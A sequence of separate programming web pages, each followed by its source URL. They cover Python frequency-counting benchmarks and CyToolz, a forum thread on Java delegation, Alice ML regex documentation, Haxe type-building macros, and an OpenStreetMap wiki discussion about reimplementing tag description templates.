Python Data Structures are Fast

tl;dr: Our intuition that Python is slow is often incorrect. Data-structure-bound Python computations are fast. You may also want to see the companion post, Introducing CyToolz.

We think that Python is slow

Our intuition says that Python is slow:

>>> # Python speeds
>>> L = range(1000000)
>>> timeit sum(L)
100 loops, best of 3: 7.79 ms per loop

>>> # C speeds
>>> import numpy as np
>>> A = np.arange(1000000)
>>> timeit np.sum(A)
1000 loops, best of 3: 725 µs per loop

Numerical Python with lots of loops is much slower than the equivalent C or Java code. For this we use one of the numeric projects like NumPy, Cython, Theano, or Numba.

But that only applies to normally cheap operations

This slowdown occurs for cheap operations, for which the Python overhead is large relative to their cost in C. For more complex operations, like data structure random access, this overhead is less important. Consider the relative difference between integer addition and dictionary assignment:

>>> x, y = 3, 3
>>> timeit x + y
10000000 loops, best of 3: 43.7 ns per loop

>>> d = {1: 1, 2: 2}
>>> timeit d[x] = y
10000000 loops, best of 3: 65.7 ns per loop

A Python dictionary assignment is about as fast as a Python add. Disclaimer: this benchmark gets a point across but is very artificial; micro-benchmarks like this are hard to do well.

Micro-Benchmark: Frequency Counting

Warning: cherry-picked

To really show off the speed of Python data structures, let's count frequencies of strings. That is, given a long list of strings:

>>> data = ['Alice', 'Bob', 'Charlie', 'Dan', 'Edith', 'Frank'] * 1000000

we want to count the occurrence of each name.
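The %timeit figures quoted above come from IPython; the same addition-vs-dictionary micro-benchmark can be reproduced with only the standard library's timeit module. A minimal sketch (absolute numbers will vary by machine and Python version):

```python
import timeit

# Time integer addition vs. dictionary assignment, as in the
# micro-benchmark above. Results are per-loop averages in nanoseconds.
n = 1_000_000
add_ns = timeit.timeit("x + y", setup="x, y = 3, 3", number=n) / n * 1e9
dict_ns = timeit.timeit("d[x] = y", setup="x, y = 3, 3; d = {1: 1, 2: 2}",
                        number=n) / n * 1e9

print(f"add:  {add_ns:.1f} ns per loop")
print(f"dict: {dict_ns:.1f} ns per loop")
```

The two figures should land within a small constant factor of each other, which is the point of the comparison.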
In principle we would write a little function like frequencies:

def frequencies(seq):
    """ Count the number of occurrences of each element in seq """
    d = dict()
    for item in seq:
        if item not in d:
            d[item] = 1
        else:
            d[item] = d[item] + 1
    return d

>>> frequencies(data)
{'Alice': 1000000, 'Bob': 1000000, 'Charlie': 1000000,
 'Dan': 1000000, 'Edith': 1000000, 'Frank': 1000000}

This simple operation tests grouping reductions on non-numerical data. It represents an emerging class of problems that doesn't fit the performance intuition we built up from numerics. We compare the naive frequencies function against the following equivalent implementations:

- The standard library's collections.Counter
- PyToolz' benchmarked and tuned frequencies operation
- Pandas' Series.value_counts method
- A naive implementation in Java, found here

We present the results from worst to best:

>>> timeit collections.Counter(data)
1.59 s            # Standard Lib

>>> timeit frequencies(data)
805 ms            # Naive Python

>>> timeit toolz.frequencies(data)
522 ms            # Tuned Python

>>> series = Series(data)
>>> timeit series.value_counts()
286 ms            # Pandas

$ java Frequencies
207 ms            # Straight Java

Let's observe the following:

- The standard library's collections.Counter performs surprisingly poorly. This comparison is unfair, because the Counter object is more complex, providing more exotic functionality that we don't use here.
- The Pandas solution uses C code and C data structures to beat the Python solution, but not by a huge amount. This isn't the 10x-100x speedup that we expect from numerical applications.
- The toolz.frequencies function improves on the standard Python solution and gets to within a factor of 2x of Pandas. The PyToolz development team has benchmarked and tuned several implementations. I believe this is the fastest solution available in pure Python.
- The compiled Java solution is generally fast but, as with the Pandas case, not that much faster.
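A quick way to sanity-check the stdlib contenders from the list above (toolz and Pandas are omitted so this sketch stays dependency-free; the compact dict.get variant here is equivalent to the post's naive function):

```python
from collections import Counter

def frequencies(seq):
    """Count the number of occurrences of each element in seq."""
    d = {}
    for item in seq:
        d[item] = d.get(item, 0) + 1
    return d

# A smaller version of the post's data set: each name appears 1000 times.
data = ['Alice', 'Bob', 'Charlie', 'Dan', 'Edith', 'Frank'] * 1000

# Both implementations agree on the result.
assert frequencies(data) == dict(Counter(data))
print(frequencies(data)['Alice'])  # -> 1000
```

Benchmarking either implementation on the full six-million-element list reproduces the ordering shown in the timings above, even if the absolute numbers differ by machine.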
For data-structure-bound computations, like frequency counting, Python is generally fast enough for me. I'm willing to pay a 2x cost in order to gain access to pure Python's streaming data structures and low entry cost.

CyToolz

Personally, I'm fine with fast Python speeds. Erik Welch, on the other hand, wanted unreasonably fast C speeds, so he rewrote toolz in Cython; he calls it CyToolz. His results are pretty amazing:

>>> import toolz
>>> import cytoolz

>>> timeit toolz.frequencies(data)
522 ms

>>> timeit series.value_counts()
286 ms

>>> timeit cytoolz.frequencies(data)
214 ms

$ java Frequencies
207 ms

CyToolz actually beats the Pandas solution (in this one particular benchmark). Let's appreciate this for a moment. Cython on raw Python data structures runs at Java speeds. We discuss CyToolz further in our next blog post.

Conclusion

We learn that data-structure-bound computations aren't as slow in Python as we might think. Although we incur a small slowdown (2x-5x), probably due to Python method dispatch, this can be avoided through Cython. When using Cython, the use of Python data structures can match the performance we expect from compiled languages like Java.
http://matthewrocklin.com/blog/work/2014/05/01/Fast-Data-Structures/
What is delegation? Could you give an example in code? The following is what I found in a Java glossary:

delegation: An act whereby one principal authorizes another principal to use its identity or privileges with some restrictions.

A good example is found at JavaWorld. Look at real life: when your boss gives you a job, you can do it yourself or you can give it to someone else, i.e. delegate it. It's the same in the next example (found at JavaWorld and in Deitel's book on Java). Here's a piece of the code:

Code:
public class Stack {
    private java.util.ArrayList list;

    public Stack() {
        list = new java.util.ArrayList();
    }

    public boolean empty() {
        return list.isEmpty();
    }
}

You're implementing a Stack, but this Stack contains an ArrayList. If you create a Stack, in fact this Stack asks for an ArrayList to be created. If you ask the Stack whether it is empty, the Stack asks the ArrayList whether it's empty. So the work is done by the ArrayList after this work is delegated by the Stack.

What does simple composition mean? Through composition, Stack holds on to an ArrayList instance. As you can see, Stack then forwards the requests to the ArrayList instance. Simple composition and request forwarding (such as that of the Stack class presented above) is often mistakenly referred to as delegation.

The idea of delegation is the basis of event-based programming. It allows you to separate logic from presentation. A user clicks his mouse pointer on a component in your GUI, or types some text into a TextField, or some other action occurs. That component generates a MouseEvent or a TextEvent or an ActionEvent. That event is dispatched to a listener; you have told the component who to send the event to in your code. The listener knows what to do if an event it is listening for arrives, and does its work.
The component does not execute the code; it delegates the handling of the event to the listener.

Mind you, these examples are found on a website and in a book. It's by no means a self-invented example. It's a bit disappointing to hear that you can no longer trust the sources on Java you were sure of. JavaWorld is just people like us writing articles. Yes, in a sense, the work performed by a contained class is a "delegation" of work, using the commonly used connotation of the English word, but is it what the "language masters" refer to as "delegation"? It's not for me to say. I've never read nor used any of Deitel's books, but I have read many reviews which trash his (what the reviewers call) lack of technical knowledge.
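The distinction the thread draws, composition/forwarding versus event-style delegation, can be sketched outside Java as well. Here is an illustrative Python analogue (the class and method names are mine, not from the original post):

```python
class Stack:
    """Composition/forwarding: Stack holds a list and forwards calls to it."""
    def __init__(self):
        self._items = []           # the contained object doing the real work

    def push(self, x):
        self._items.append(x)      # request forwarded to the list

    def empty(self):
        return len(self._items) == 0


class Button:
    """Event-style delegation: the component hands the event to a listener."""
    def __init__(self, listener):
        self._listener = listener  # "who to send the event to"

    def click(self):
        self._listener("clicked")  # component does not handle the event itself


s = Stack()
assert s.empty()
s.push(1)
assert not s.empty()

events = []
Button(events.append).click()
assert events == ["clicked"]
```

The Stack decides nothing; it merely forwards. The Button also does no handling of its own, but the listener it was configured with is chosen by the caller at runtime, which is the part the thread identifies with event-based delegation.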
http://forums.devx.com/showthread.php?147701-Need-help-with-simple-program&goto=nextnewest
signature REGEX
structure Regex : REGEX

This structure provides an interface to a (subset of) POSIX-compatible regular expressions. Note, however, that the functions resulting from this partial application cannot be pickled.

import structure Regex from "x-alice:/lib/regex/Regex"
import signature REGEX from "x-alice:/lib/regex/REGEX-sig"

signature REGEX =
sig
    type match
    infix 2 =~

    exception Malformed
    exception NoSuchGroup

    val match      : string -> string -> match option
    val =~         : string * string -> bool
    val groups     : match -> string vector
    val group      : match * int -> string
    val groupStart : match * int -> int
    val groupEnd   : match * int -> int
    val groupSpan  : match * int -> (int * int)
end

type match
    The abstract type of a matching.

exception Malformed
    Indicates that a regular expression was not well-formed.

exception NoSuchGroup
    Indicates that an access to a group of a match has failed: no such group exists.

match r s
    Returns SOME m if r matches s, and NONE otherwise. Raises Malformed if r is not a well-formed regular expression.

r =~ s
    The following equivalence holds: r =~ s = Option.isSome (match r s)

groups m
    Returns a string vector of the groups of the matching m.

group (m, i), groupStart (m, i), groupEnd (m, i), groupSpan (m, i)
    These need a match m and an index i. They raise NoSuchGroup if i >= Vector.length (groups m) or i < 0.

This structure provides pattern matching with POSIX 1003.2 regular expressions. The form and meaning of Extended and Basic regular expressions are described below. Here R and S denote regular expressions; m and n denote natural numbers; L denotes a character list; and d denotes a decimal digit.

Some example character lists L:

Remember that backslash (\) must be escaped as "\\" in SML strings.

Example: match an SML integer constant [Extended]:
    match "^~?[0-9]+$"

Example: match an SML alphanumeric identifier [Extended]:
    match "^[a-zA-Z0-9][a-zA-Z0-9'_]*$"

Example: match an SML floating-point constant [Extended]:
    match "^[+~]?[0-9]+(\\.[0-9]+|(\\.[0-9]+)?[eE][+~]?[0-9]+)$"

Example: match any HTML start tag, making the tag's name into a group [Extended]:
    match "<([[:alnum:]]+)[^>]*>"
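As a cross-check of the patterns above, two of them translate almost directly into Python's re module. Note the two points of divergence: SML writes unary minus as ~ (so ~42 is a valid SML integer constant), and the POSIX class [[:alnum:]] must be spelled out, since Python's re does not support POSIX bracket classes. This is an illustrative analogue, not Alice ML code:

```python
import re

# SML integer constant: "^~?[0-9]+$"  (~ is SML's unary minus)
int_const = re.compile(r"^~?[0-9]+$")
assert int_const.match("~42")
assert int_const.match("123")
assert not int_const.match("1.5")

# HTML start tag with the name captured as group 1, mirroring
# "<([[:alnum:]]+)[^>]*>" with the POSIX class written out.
tag = re.compile(r"<([a-zA-Z0-9]+)[^>]*>")
m = tag.search('<a href="x">link</a>')
assert m.group(1) == "a"
assert m.span(1) == (1, 2)   # start/end offsets, like groupSpan (m, 1)
```

Python's m.group(i) raises IndexError for an out-of-range group, playing the role of NoSuchGroup in the signature above.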
http://www.ps.uni-saarland.de/alice/manual/library/regex.html
Type-building macros are different from expression macros in several ways:

- They return an Array<haxe.macro.Expr.Field> rather than an expression.
- The fields of the type being built are available through haxe.macro.Context.getBuildFields().
- They are invoked via @:build or @:autoBuild metadata on a class or enum declaration.

The following example demonstrates type building. Note that it is split up into two files for a reason: if a module contains a macro function, it has to be typed into macro context as well. This is often a problem for type-building macros because the type to be built could only be loaded in its incomplete state, before the building macro has run. We recommend always defining type-building macros in their own module.

import haxe.macro.Context;
import haxe.macro.Expr;

class TypeBuildingMacro {
  macro static public function build(fieldName:String):Array<Field> {
    var fields = Context.getBuildFields();
    var newField = {
      name: fieldName,
      doc: null,
      meta: [],
      access: [AStatic, APublic],
      kind: FVar(macro : String, macro "my default"),
      pos: Context.currentPos()
    };
    fields.push(newField);
    return fields;
  }
}

@:build(TypeBuildingMacro.build("myFunc"))
class Main {
  static public function main() {
    trace(Main.myFunc); // my default
  }
}

The build method of TypeBuildingMacro performs three steps:

1. It obtains the build fields using Context.getBuildFields().
2. It declares a new haxe.macro.Expr.Field using the fieldName macro argument as the field name. This field is a String variable with a default value "my default" (from the kind field) and is public and static (from the access field).
3. It pushes the new field onto the build fields and returns them.

This macro is the argument to the @:build metadata on the Main class. As soon as this type is required, the compiler executes the build macro named in the @:build metadata. This allows adding and modifying class fields at will in a type-building macro. In our example, the macro is called with a "myFunc" argument, making Main.myFunc a valid field access.

If a type-building macro should not modify anything, the macro can return null. This indicates to the compiler that no changes are intended and is preferable to returning Context.getBuildFields().
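Haxe's @:build hook has no direct Python equivalent, but the underlying idea (injecting a field into a type at definition time) can be sketched with a class decorator. This is purely illustrative; the names below are mine, not from the Haxe manual:

```python
def build(field_name):
    """Return a decorator that adds a static string field to a class,
    loosely analogous to TypeBuildingMacro.build in the Haxe example."""
    def decorate(cls):
        # Analogue of pushing FVar(macro : String, macro "my default")
        # onto the build fields.
        setattr(cls, field_name, "my default")
        return cls
    return decorate


@build("myFunc")          # analogue of @:build(TypeBuildingMacro.build("myFunc"))
class Main:
    pass


print(Main.myFunc)        # -> my default
```

As with @:build, the decorator runs once when the class is defined, and the injected name becomes a valid attribute access afterwards. The key difference is that Haxe's version runs at compile time inside the typer, while the Python decorator runs at ordinary runtime.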
https://haxe.org/manual/macro-type-building.html
Template talk:Description User:Moresby/KeyDescription and User:Moresby/ValueDescription are reimplementations of the various {{KeyDescription}} and {{ValueDescription}} templates used widely across this wiki to document tag usage. Contents - 1 Rationale for this new template - 2 Side-by-side comparison - 3 Implementation plan - 4 Discussion - 4.1 native_key and native_value - 4.2 Language-specific tool links - 4.3 Nice work - 4.4 New proposed KeyDescription Template - 4.5 Problem(s) - 4.6 Website and URL pattern - 4.7 Missing templates - 4.8 Formatting of parameters - 4.9 Thank you for doing this - 4.10 Templates without image parameter - 4.11 Wikidata - 4.12 Why statuslink is present in documentation but not used in template? - 4.13 Wikidata link - 4.14 Rendering - 4.15 Edits since January 2015, consider reversion - 4.16 Unlinked image - 4.17 One discussion place - 4.18 Remove User:Moresby links from See Also - 4.19 Support of value only - 4.20 Separating usage and proposal status Rationale for this new template Back in October 2007 Etric Celine created the very first key description template as an attempt "to get a well designed structure into the available Keys that exist to describe a map feature." Over the more-than-six years since then, this approach has grown into nearly forty such templates in over twenty languages: Lazzko created the first non-English template in July 2008 in Finnish, and German, Italian, Hungarian and other languages followed later, with Catalan being the most recent addition. Despite some fairly advanced template magic being present in the English-language template to provide language support, the templates for non-English languages were implemented separately, and their paths have diverged somewhat ever since. While this has allowed special customisation for the different requirements of each language community, this has also meant that changes and maintenance of such a wide number of templates has been difficult. 
The templates show a range of different levels of implementation: some include later features from the English templates, and many contain links to now-non-functioning external sites. It is simply a lot of work to understand, maintain and keep up to date this spread of templates. And template design and building isn't for everyone: the proportion of people with the knowledge, time and inclination to put effort into description templates is small, meaning that in any given language community, that group is likely to be very small indeed. As OpenStreetMap builds and grows as a true multi-language project, there needs to be an emphasis on supporting non-English communities well, particularly the newer, smaller ones. So this reimplementation of the {{KeyDescription}} and {{ValueDescription}} templates attempts to address some of these issues and to seriously renovate the current setup, without affecting the visible user experience in any significant way. Improved language support, increased consistency and ease of maintenance have been the key drivers here, along with a few small cosmetic tweaks aimed at improving the overall look.

Language support

This template has been designed from the outset to support full internationalization. By separating the formatting (title, headings, etc.) from the language content, the template can be used just as well on a Japanese-language page as on an English-language one. As mentioned above, this approach is not new (Miloscia pioneered it in August 2013), but it is taken further here. By providing excellent language support, it will be possible to migrate non-English pages away from language-specific description templates to this new template, allowing changes and fixes to take place in a single place rather than in multiple locations.
The discussion here has been moved further down the page.

Maintainability

The existing {{KeyDescription}} and {{ValueDescription}} templates have developed over some time, and are now quite difficult to understand. The new templates are built from a series of smaller templates, each with its own documentation and test cases. The new template hierarchy is as shown:

{{Template:KeyDescription}}
{{Template:ValueDescription}}
 |
 +---- {{Template:Description}}
        |
        +---- {{Template:TagPagename}}             <-- link to canonical pages for key, value
        |
        +---- {{Template:RelationPagename}}        <-- link to canonical pages for relation
        |
        +---- {{Template:Languages}}               <-- links to the same content in other languages
        |
        +---- {{Template:DescriptionCategories}}   <-- categorises according to group, key, value, language
        |      |
        |      +---- {{Template:DescriptionCategory}}
        |
        +---- {{Template:DescriptionLang}}         <-- provides translations for key content
        |      |
        |      +---- {{Template:TranslateThis}}    <-- encourages reader to submit a new translation
        |
        +---- {{Template:GroupLink}}               <-- hyperlinks group name
        |
        +---- {{Template:ElementUsage}}            <-- shows which type of elements to use this on
        |      |
        |      +---- {{Template:ElementUsage2}}
        |      |
        |      +---- {{Template:ElementUsageLang}} <-- provides translations for element usage phrases
        |             |
        |             +---- {{Template:TranslateThis}} <-- encourages reader to submit a new translation
        |
        +---- {{Template:StatusLang}}              <-- provides translations for statuses
        |      |
        |      +---- {{Template:TranslateThis}}    <-- encourages reader to submit a new translation
        |
        +---- {{Template:DescriptionCategory}}     <-- categorises according to status
        |
        +---- {{Template:DescriptionLinks}}        <-- links to external web pages about this key, value
        |
        +---- {{Template:TaginfoLinks}}            <-- generate links to taginfo instances
        |
        +---- {{Template:TaginfoLinksPerLanguage}} <-- which taginfo instances to link to for this language

The main template is also broken down into chunks, with some explanation in the comments of what each chunk contributes.
Personalisation If you want to personalise the look of the description boxes, the new templates give you that option. The main box is a table with class description and either keydescription or valuedescription. You can add personal CSS rules on your personal wiki CSS page to change the CSS styles which are applied. For example, adding this code: table.description { background-color: #ccf !important; border: 3px solid black !important; } changes the colour of description boxes to blue, and adds a wider border. The following classes are also defined: For example, if you do not want to see taginfo details at all, the following line on your CSS page will remove them completely: table.description tr.d_taginfo { display: none; } Cosmetic/minor tweaks The following minor tweaks have been made in the new templates: - top margin reduced from .2em to 0px - image horizontally centred within box, not left-aligned - thin space inserted either side of the '=' in the title of the value description box - show/hide for tag tools removed, as very few tool lines needed - default image changed from to or as appropriate - values in box title hyperlinked to appropriate description page, allowing easy navigation where the description box is on a different page - improved handling where important parameters are missing - "group" and "status" information combined: header and value on same line to reduce vertical size of box Side-by-side comparison Each of the following is a real-life usage of one or other of the current description templates, taken from a page on this wiki. In the case of the current templates, the template has been subst:-ed and the language links removed, simply to make the table readable. The new template is called with exactly the same parameters, except for languagelinks = no to switch off the language links, and lang = ?? to indicate which language to use. 
Implementation plan The following implementation seems sensible, with enough time for each stage/between stages to check that nothing is going too wrong. - Stage 1: publish this outline here, encourage discussion, identify and address any bugs, problems, concerns or questions; use this template in a small number of real pages to check for compatibility across more real-world usages, languages, etc. - The following pages are being used to test these templates: - Stage 2: once reasonable consensus has been achieved, select a medium-sized language group and move usage of existing language-specific template to this one, checking for compatibility, readability, etc. - Updated seven pages which included {{Fi:ValueDescription}}but did not have lang =parameter specified: set lang = fi - Replaced Template:Fi:ValueDescription with redirect to User:Moresby/ValueDescription - These pages now using new template: - Fi:Tag:amenity=atm - Fi:Tag:amenity=baby_hatch - Fi:Tag:amenity=bank - Fi:Tag:amenity=bicycle_parking - Fi:Tag:amenity=bicycle_rental - Fi:Tag:amenity=bureau_de_change - Fi:Tag:amenity=car_rental - Fi:Tag:amenity=car_sharing - Fi:Tag:amenity=cinema - Fi:Tag:amenity=courthouse - Fi:Tag:amenity=crematorium - Fi:Tag:amenity=embassy - Fi:Tag:amenity=ferry_terminal - Fi:Tag:amenity=fire_station - Fi:Tag:amenity=fountain - Fi:Tag:amenity=fuel - Fi:Tag:amenity=library - Fi:Tag:amenity=nightclub - Fi:Tag:amenity=police - Fi:Tag:amenity=prison - Fi:Tag:amenity=recycling - Fi:Tag:amenity=telephone - Fi:Tag:amenity=theatre - Fi:Tag:amenity=townhall - Fi:Tag:amenity=veterinary - Fi:Tag:building=garage - Fi:Tag:building=garages - Fi:Tag:highway=crossing - Fi:Tag:highway=footway - Fi:Tag:highway=secondary - Fi:Tag:highway=speed_camera - Fi:Tag:highway=steps - Fi:Tag:highway=tertiary - Fi:Tag:highway=unclassified - Fi:Tag:leisure=dog_park - Fi:Tag:leisure=slipway - Fi:Tag:man_made=wastewater_plant - Fi:Tag:man_made=watermill - Fi:Tag:natural=tree - Fi:Tag:natural=wetland - 
Fi:Tag:power=tower - Fi:Tag:railway=crossing - Fi:Tag:railway=level_crossing - Fi:Tag:service=parking_aisle - Fi:Tag:shop=bakery - Fi:Tag:shop=bicycle - Fi:Tag:shop=butcher - Fi:Tag:shop=car - Fi:Tag:shop=dry_cleaning - Fi:Tag:sport=shooting - Fi:Tag:tourism=hotel - Fi:Tag:tourism=zoo - Fi:Tag:waterway=river - Fi:Tag:waterway=stream - Replaced Template:NL:KeyDescription with redirect to User:Moresby/KeyDescription - These pages now using new template: - NL:Key:cycleway - NL:Key:building - NL:Key:amenity - NL:Key:demolished - NL:Key:office - NL:Key:addr - NL:Key:man_made - NL:Key:shop - NL:Key:tourism - NL:Key:craft - NL:Key:emergency - NL:Key:public_transport - NL:Key:name - NL:Key:type - NL:Key:route_master - NL:Key:colour - NL:Key:landuse - NL:Key:military - NL:Key:natural - NL:Key:leisure - NL:Key:fenced - NL:Key:fence_type - NL:Key:barrier - NL:Key:backrest - NL:Key:bench - NL:Key:waste - Stage 3: assuming no showstoppers, replace one or other of {{KeyDescription}}or {{ValueDescription}}with the new template {{ValueDescription}}replaced with a redirect to User:Moresby/ValueDescription at around 2014-04-14 21:30 GMT. - Stage 4: replace the other with the new template {{KeyDescription}}replaced with a redirect to User:Moresby/KeyDescription at around 2014-04-17 22:30 GMT. - reverted by User:Pigsonthewing at around 2014-04-17 23:00 GMT — discussion. - Extra url_patternadded, and redirect reinstated at around 2014-04-18 15:35 GMT. 
- Stage 5: redirect language templates to User:Moresby/KeyDescription or User:Moresby/ValueDescription as appropriate, identifying any remaining language-specific features and incorporating as appropriate - Stage 6: update individual description pages to point to {{KeyDescription}}or {{ValueDescription}}, retaining page-specific parameters - Stage 7: replace content of {{KeyDescription}}and {{ValueDescription}}with code from User:Moresby/KeyDescription and User:Moresby/ValueDescription - Stage 8: collect and find appropriate places for documentation and discussion Discussion native_key and native_value This discussion was moved from above. I would like to see two extra parameters. native_key and native_value. This will allow us to add the names of the key and value in the language of the user and enable him to find a key or value in his language. See Polish version of any tag. --Władysław Komorek (talk) 21:16, 30 March 2014 (UTC) - Keys and values are a machine-readable constant. They must not be translated, otherwise they no longer work. (I assume we were supposed to discuss below the box? Feel free to move my comment down.) --Tordanik 16:27, 31 March 2014 (UTC) - I do not mean their translations, only adding additional, optional, parameters, where the user enters a names in their own language. --Władysław Komorek (talk) 16:34, 31 March 2014 (UTC) - Then why do you insist on calling them "key" and "value"? The last time you suggested this, I've given a lot of suggestions on how to do this without this misleading presentation format, and even without the limitation of having only one possible native word for each key. --Tordanik 16:40, 31 March 2014 (UTC) - I also replied to you that your suggestions do not solve the case. - It seems that you do not accept a different approach to help users, who do not speak English, select the appropriate tag. 
--Władysław Komorek (talk) 18:34, 31 March 2014 (UTC) - You indeed declined all alternatives I offered, but I still wonder why. These are what the German community uses, and I don't remember anyone ever asking for a list with entries like Straße=Autobahn. I hope we can still find an alternative, because there is exactly one approach that I do not want: Making things that should not be entered into the database look like tags. --Tordanik 19:50, 31 March 2014 (UTC) Language-specific tool links Hi, let me first say thank you for the amount of work all this must have been. I think that the consolidation of the various versions of this template is a step in the right direction. Unfortunately, I'm having a hard time following the MediaWiki template syntax across the many templates despite your laudable effort to include comments. So could you perhaps help me understand how having different tool links for each language will work? --Tordanik 16:50, 31 March 2014 (UTC) - Thanks. :-) I really think this could make a difference. Yes, when I started, I thought that per-language support for external links would be a sensible thing. But when I analysed which external links the various templates provided, there was some language-based variation, but almost exclusively to sites which no longer functioned. Here's an analysis of which sites are linked to across the entire set of templates: - So, that left only three or four active sites, and I managed to squeeze them quite happily into the bottom of the box, via the {{DescriptionLinks}}template, which I seem to have missed in the tree above - sorry, I'll fix that. The template is passed the language of the description box, so it could, as was originally the idea, provide links which are specific to that language/locale. But it's not at the moment, as there aren't any to provide… If/when there's call for it, I (or someone else) can add this in, but at the moment everyone gets the same external links. 
For now, that's probably quite a good thing, perhaps. Moresby (talk) 22:13, 31 March 2014 (UTC) - The obvious candidates would be the local taginfo instances. Right now it's just UK/US/FR for everyone, but the several sites on openstreetmap.ru seem pretty much alive. It's not something that has to be done right now, of course. But it's good to know that we will be able to provide a bit more variation eventually. --Tordanik 23:24, 31 March 2014 (UTC) - OK, breaking news: have a look here. Each user can now configure which country sites he/she wants in addition to or instead of the default set. I'm working on being able to set a different default set for descriptions of a given language, but that's not there yet. Do let me know what you think.... Moresby (talk) 13:26, 12 April 2014 (UTC) Nice work This looks very promising and I think you're doing a great job. A few comments: - The lang parameter could default to {{langcode}}, which deduces the language from the name of the page, making it usually unnecessary to set explicitly. - Some parameters (onNode, combination and so on) would be expected to be the same for every language a tag is documented in. Is there a way to set them for all languages? - Some pages use {{RelationDescription}} and its language versions. Is that to be brought into this scheme, or can we revisit whether values of the type=* key actually need their own template? --Andrew (talk) 06:42, 1 April 2014 (UTC) - Why did you add a lang parameter to each page instead of deducing the language in the template as I suggested on this page last week? --Andrew (talk) 11:50, 10 April 2014 (UTC) - Hiya - sorry, I wasn't ignoring you, although it absolutely must have looked like it…. I didn't know about {{langcode}} before you mentioned it, and it seems to be an excellent idea - I like your plan a lot. I'm going to look at that next. When I got to trying a whole language, you're absolutely right, I could have used langcode first.
In this case, I picked fi as a medium-sized language group, looked to see how many there were with lang not specified, and found seven. I chose to edit those seven by hand and get a stage further forward, rather than implement {{langcode}} then. But that approach is going to be too much work across all the languages, which is where your idea comes in. - Your other comments are also spot on: at the back of my mind I have some ideas of how to separate important information from individual pages, so it can be called on in different ways. If you're interested, have a look at this thing where I was experimenting with this template as a way to hold information on keys and values. There's a lot to do to get it working sensibly, but I think it's a worthwhile approach. And I'd not spotted {{RelationDescription}} until you pointed it out: it just shows that there can be really important stuff under your nose and you don't know it's there. Thanks - that looks like a great thing to incorporate. - Thanks for your valuable input and encouragement - apologies again it's taken me a while to respond. Moresby (talk) 12:51, 10 April 2014 (UTC) New proposed KeyDescription Template This discussion was moved from User talk:Moresby. Hi Moresby, I just have several questions about your new proposed templates: - will it work with the Czech or Polish languages? The reason I ask is that Czech and Polish are not really namespaces on this Wiki, which complicates things a bit. - can you make the Group name a clickable link, as I have done in the current KeyDescription? Or do you not like this idea? - will I be able to use other TagInfo servers as I do in the current Czech version of KeyDescription? Chrabros (talk) 05:17, 7 April 2014 (UTC) - Thanks for the feedback! The implementation is not dependent on namespaces at all, so Czech and Polish shouldn't be a difficulty for this reason.
There's a complication for Polish, though, as Władysław Komorek has added a "native key" functionality to the templates, which none of the other languages have. I can see arguments for and against this, the discussion has been going backwards and forwards in various places for some time, and I'm really not wanting to take one side or another - that's for others to debate. So for now, I'm leaving Polish alone. You'll see in my implementation plan that the next stage involves migrating an entire language group. I've not come to any conclusion which to choose, but Czech is certainly an option. I notice you're fluent in Czech - if you'd be happy to review the changes once they're implemented, and point out any problems, I'd be really grateful. - Yup, you're right that the group is a clickable link on current templates, and I've missed that. Apologies - I've not meant to remove any existing functionality without a very good reason, and this was an oversight. I'll get onto it. - Tordanik was very helpful in discussing external links here, where I outline how I got to where we are with just a few taginfo options. I'm determined to give people a good set of options, and he pointed me to this page which lists taginfo sites. Please make sure your favourite sites are on that list, and I'll work out how to make sure you have easy access to them. :-) - Thanks again for your comments and interest. It's really encouraging to hear from others what they think. Moresby (talk) 07:36, 7 April 2014 (UTC) - If I've got it right, I'll change the current Czech template to call the new one, and everything should simply drop into place, with Czech translations of the headings in the boxes, and so on. All I'll need from you is some reassurance that the language is OK in context - the rest I should be able to work out. Like any other change, it can be undone at any time, of course, so there will be nothing which is irreversible. 
It's just that a second opinion from a Czech native speaker will make me less worried. :-) Moresby (talk) 09:24, 7 April 2014 (UTC) - Here are the current problems with your template as I see them: - the Czech categories are gone (I had Cs:Značky podle klíče, Cs:Značky podle hodnoty, Cs:Klíče:amenity, Czech Documentation) - links and descriptions of the element icons were in Czech; they are English now ("Can be used on Node", link to Node page) - Tools are very wrong - I had two Taginfos (one worldwide and one for the Czech Republic only), then I had another selection of some interesting countries. I think it is important for every country to choose which other countries they want to see here. - The Overpass turbo icon is gone, and it was a nice one. ;-) - Why is there the ugly green checkmark? File:Yes check.svg Chrabros (talk) 03:15, 8 April 2014 (UTC) - Thank you - this is exactly the sort of feedback which I need to get this right. I assume your comments came from looking at Cs:Tag:historic=cannon. - I take your point about the Czech categories. Working out which categories existing templates put pages into and coming up with some sort of rationalisation was one of the biggest headaches in getting this together. You can see some of the work I did understanding this on the documentation of the {{DescriptionCategories}} template. When you attempt to consolidate forty or more divergent approaches into just one, there are going to be some differences, and what you've seen is just one of them. There's absolutely no reason that these categories shouldn't be added to Czech description pages - I'll get onto that. - Well spotted. These are supposed to be translated, as you can see from the template examples. For some reason I can't work out, I managed to skip Czech when I pulled all the translations into one place in Template:ElementUsageLang. Apologies - I'll fix that. - You can see some of the discussion about language-specific tool links here.
I surveyed which taginfo sites were being used, saw that taginfo.openstreetmap.cz was linked, but that its data was only as recent as February, and crossed it off my list of active sites. I'm more than happy to put it back in, and your comments support the views in the discussion I've just linked to that language-specific tool selection is a good way to go forward. - Overpass turbo is still there - it's right at the bottom, but I took out the logo, as I felt that it was too big, looked out of place and didn't match the other links. - If I understand you correctly, the check mark is not connected with this template, but appeared as a result of this edit of yours which included {{Tag stub}}. - Again, thanks for this: you've picked up a few things to fix, which is exactly what I'm after. Watch this space.... :-) Moresby (talk) 09:11, 8 April 2014 (UTC) - OK, I've made some changes: - I think that all the existing categories populated by the existing {{Cs:KeyDescription}} and {{Cs:ValueDescription}} templates will now also be provided by the new description templates. That's now implemented in {{DescriptionCategories}} - have a peek, and change the Czech section if you like. - There's Czech hover-text on the element usage icons now that I've added it to {{ElementUsageLang}} - The Czech taginfo site is now on everyone's description boxes, now that I've added it to {{DescriptionLinks}}. There aren't many taginfo sites in there yet, so for now they can all be displayed on all pages, but I'll get to that in time. - Thanks again. I'm really grateful you've been able to take the time to review this for me. Moresby (talk) 12:17, 8 April 2014 (UTC) - Hi, it is getting better, but there are still some things I miss: - Yes, I had not noticed that, but in the English version of this page the check mark is where it should be - in the stub box - but in your version it overlaps with the KeyDescription box. Why? I do not know; this is beyond my wiki skills. - Czech Categories - OK, done, fine.
